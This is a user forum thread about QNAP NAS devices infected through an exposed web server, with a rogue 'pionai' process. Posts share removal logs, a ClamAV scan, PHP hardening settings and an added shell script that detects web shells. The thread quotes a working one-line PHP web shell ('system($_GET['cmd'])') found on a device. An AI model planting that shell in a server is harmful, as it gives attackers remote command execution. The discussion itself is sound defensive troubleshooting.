Unknown Thread kthreaddnai
-
- Starting out
- Posts: 11
- Joined: Wed Mar 28, 2018 8:45 am
Re: Unknown Thread kthreaddnai
Both Gitea and Nextcloud are exposed through ContainerStation
-
- First post
- Posts: 1
- Joined: Fri Sep 28, 2018 3:01 pm
Re: Unknown Thread kthreaddnai
I encountered the same problem a few days ago.
I have no idea where this process originates from or what it does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.
After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan my system every day at 03:00 AM to keep it clean.
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.
- OneCD
- Guru
- Posts: 12039
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
Re: Unknown Thread kthreaddnai
Is any part of your NAS exposed to the Internet?
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
-
- First post
- Posts: 1
- Joined: Tue Jun 05, 2012 3:10 pm
Re: Unknown Thread kthreaddnai
I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.
So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On
Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
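The two checks described in the post above, written out as an added example (not the poster's commands and not QNAP tooling): it lists PHP files that pass request parameters straight into a command-execution function, and reports which of those functions a php.ini still leaves enabled. The function names, the sample file names and the temporary directory are assumptions made for the demo.

```sh
#!/bin/sh
# Added example (not from the thread): audit a web root and a php.ini.
EXEC_FUNCS='exec|passthru|shell_exec|system|proc_open|popen'

# List .php files under $1 where a command-execution call receives request
# data on the same line, e.g. system($_GET['cmd']).
find_webshells() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        '(^|[^A-Za-z0-9_])('"$EXEC_FUNCS"')[[:space:]]*\(.*\$_(GET|POST|REQUEST|COOKIE)' \
        {} + 2>/dev/null | sort
}

# Print each command-execution function that the php.ini in $1 leaves enabled.
# Commented-out lines (starting with ';') are ignored; the last setting wins.
enabled_exec_funcs() {
    disabled=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" |
        tail -n 1 | tr -d '[:space:]"')
    for f in $(printf '%s' "$EXEC_FUNCS" | tr '|' ' '); do
        case ",$disabled," in
            *",$f,"*) ;;                 # listed in disable_functions
            *) printf '%s\n' "$f" ;;     # still callable from PHP
        esac
    done
}

# Demo on constructed files in a temporary directory (nothing on the NAS is touched).
demo() {
    d=$(mktemp -d)
    # Constructed sample: the one-line file content quoted in the post.
    printf '%s\n' "CMD2018<br><pre><?php @system(\$_GET['cmd']);?></pre>" > "$d/sample_shell.php"
    # Constructed benign page: curl_exec() must not be mistaken for exec().
    printf '%s\n' '<?php $r = curl_exec($ch); echo htmlspecialchars($_GET["q"]); ?>' > "$d/benign.php"
    printf '%s\n' 'disable_functions = exec,passthru,shell_exec' > "$d/php.ini"
    echo "Suspicious PHP files:"; find_webshells "$d"
    echo "Still enabled in php.ini:"; enabled_exec_funcs "$d/php.ini"
    rm -rf "$d"
}
demo
```

On the NAS the same functions would be pointed at the paths named in this thread (/share/Web and /etc/config/php.ini). The pattern only catches a request variable used on the same line as the call, so an obfuscated file can pass it unnoticed.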
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
cufiler wrote: ↑Thu Nov 15, 2018 6:13 pm
I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.
So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On
Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
What are these settings?
I have already deleted the folder pionai under /tmp/. Also, I closed port 80. I have not yet made the settings in the INI data.
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
-
- New here
- Posts: 6
- Joined: Thu May 05, 2016 2:57 am
Re: Unknown Thread kthreaddnai
I have the same critter in my TS-251.
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php
good luck
- Trexx
- Ask me anything
- Posts: 5393
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Unknown Thread kthreaddnai
You might try using the new malware remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run real-time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full featured IPS/IDS platform / reverse proxies/etc. can help mitigate risk as well.
Paul
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model: TVS-673 32GB & TS-228a Offline
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
- dolbyman
- Guru
- Posts: 35024
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Unknown Thread kthreaddnai
and all please open tickets with qnap so they can investigate+improve malware removal
-
- Starting out
- Posts: 11
- Joined: Wed Mar 28, 2018 8:45 am
Re: Unknown Thread kthreaddnai
Hello !
I completely reinstalled my NAS in the last few days (data backup + full disk format on another PC).
All was OK until I reinstalled CodexPack and PhotoStation yesterday, so I suspect it's coming from one of them.
Still investigating...
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
Closing port 80 has temporarily brought peace. QNAP still has not processed my ticket.
-
- Getting the hang of things
- Posts: 62
- Joined: Thu Jun 03, 2010 5:16 am
Re: Unknown Thread kthreaddnai
Any luck getting rid of it? I'm having the same issues.
-
- Starting out
- Posts: 31
- Joined: Thu May 07, 2009 9:58 pm
Re: Unknown Thread kthreaddnai
I had the 'pionai' process running and raised a helpdesk ticket.
I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152
It worked for me
QNAP TVS1282 (PRD box)
V4.5.1.1540
8x Seagate 8TB Ironwolf (2x RAID 5 Storage Pools)
4x 1TB Crucial SSD (2x RAID1 Storage Pools)
2x 500GB Samsung PCIe RAID 0 R/W Cache
QNAP TS670 Pro (DEV/Backup box)
V4.3.7.(latest) EOL
6x Seagate 8TB Ironwolf RAID 5
Riello VSD 1500 UPS